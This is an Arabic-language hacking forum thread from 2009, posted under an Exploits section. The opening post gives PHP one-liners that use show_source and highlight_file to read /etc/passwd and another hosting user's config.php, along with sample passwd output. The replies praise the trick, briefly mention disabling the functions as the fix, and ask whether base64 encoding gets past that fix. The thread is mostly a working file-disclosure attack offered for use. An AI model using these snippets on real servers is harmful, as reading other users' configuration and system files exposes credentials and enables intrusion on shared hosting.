php4.x php5.2.x all show_source (bypass)safe_mode off

Super-Crystal · #1 01-04-2009, 08:16 PM

Credit: Super-Crystal
safe_mode off (tested)

كود PHP:


			
<?

show_source (’/etc/passwd’);

?>

———————–

كود PHP:


			
<?

show_source (’/home/user/public_html/config.php’);

?>

كود PHP:


			
<?

highlight_file (”/etc/passwd”);

?>

كود:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin

priv8 now
until tomorrow

Al-AlaME · #2 01-04-2009, 08:32 PM

الرد رقم 1 - محجوز :d

ولي عودة

mex · #3 01-04-2009, 08:36 PM

محجوز 2

Djekmani4ever · #4 01-04-2009, 11:08 PM

وان اضفنا تلك الدوال لdisables-function

Super-Crystal · #5 01-04-2009, 11:31 PM

المشاركة الأصلية بواسطة Djekmani4ever

وان اضفنا تلك الدوال لdisables-function

هلابالاستاذ نعم هذا هو الترقيع لها وقمت بطرحه بموضوع سابق هنا

Big Boss · #6 01-04-2009, 11:43 PM

السلام عليكم

طبعا اهنيك ياسوبر على الطرح الرائع

الي يدل على عقلية شيطنبوتية عملاقة ..

ياخوان من كان يتخيل إن دالتين مثل هذي اسهى عنها كل خبراء الحماية

لان عملها مو فقط قراءة يإخوان لها عمل اخر ..

وماكان احد متخيل ان هالدوال راح تسبب تخطي لقراءة ملف ليوزر معين على السيرفر او ملف passwd

التفكير بها الشي بحد ذاته انتاج وإبتكار وطرح لذيذ بنكهة شيطنبوتية ..

مأقول غير الله يوفق سوبر على طروحه الرائعة وشروحه الممتازة

ومن هذا الشرح استفدنا ياخوان انك تعلم ان الشخص مايستهين حتى بأصغر شي بالحماية ممكن يسبب كارثة

بالتوفيق للإخوان

دمتم بود ..

هبووب الشمال · #7 01-05-2009, 12:45 AM

إبدآع ،، طيب ،،

يعني لو كآن مشفر بالـBase64 بتخطى الترقيع ؟!!

اللي أنت منزله ؟!

أنتضر ردك

Super-Crystal · #8 01-05-2009, 03:15 AM

BigBoss ابوبندر ردك اخجلني صراحة ٍ ولو هذا شئ متواضع ...

-----------------

هبوب الشمال ماله علاقه تشفير الداله لانها محجوبه صحيح لو كان مود سكيورتي ممكن تشفرها وتنجح معاك ...

خـُرافـي · #9 01-05-2009, 05:04 AM

مآ أزيد على درر أبو بندر ..

بارك الله فيك

dEV!L-nEt · #10 01-05-2009, 11:10 AM

ماشاء الله عليك يا سوبر

عقلية نظيفة

كثر الله من امثالك ان شاء الله

لي رجعة ان شاء الله ,,

مواضيع مشابهة
الموضوع	كاتب الموضوع	المنتدى	الردود	آخر مشاركة
php4.x php5.2.x all show_source (bypass)safe_mode off	Super-Crystal	إكتشافاتنا [Exploits]	17	01-08-2009 12:32 AM

خيارات الموضوع	بحث في هذا الموضوع
عرض نسخة للطّباعة أرسل هذه الصفحة لصديق	بحث في هذا الموضوع: بحث متقدم
طريقة العرض	قيّم هذا الموضوع
النمط الخطي التحويل إلى النمط الشجري التحويل إلى النمط المتطوّر	قيّم هذا الموضوع:

عدد الأعضاء الذي يتصفحون هذا الموضوع : 1 (0 عضو و 1 ضيف)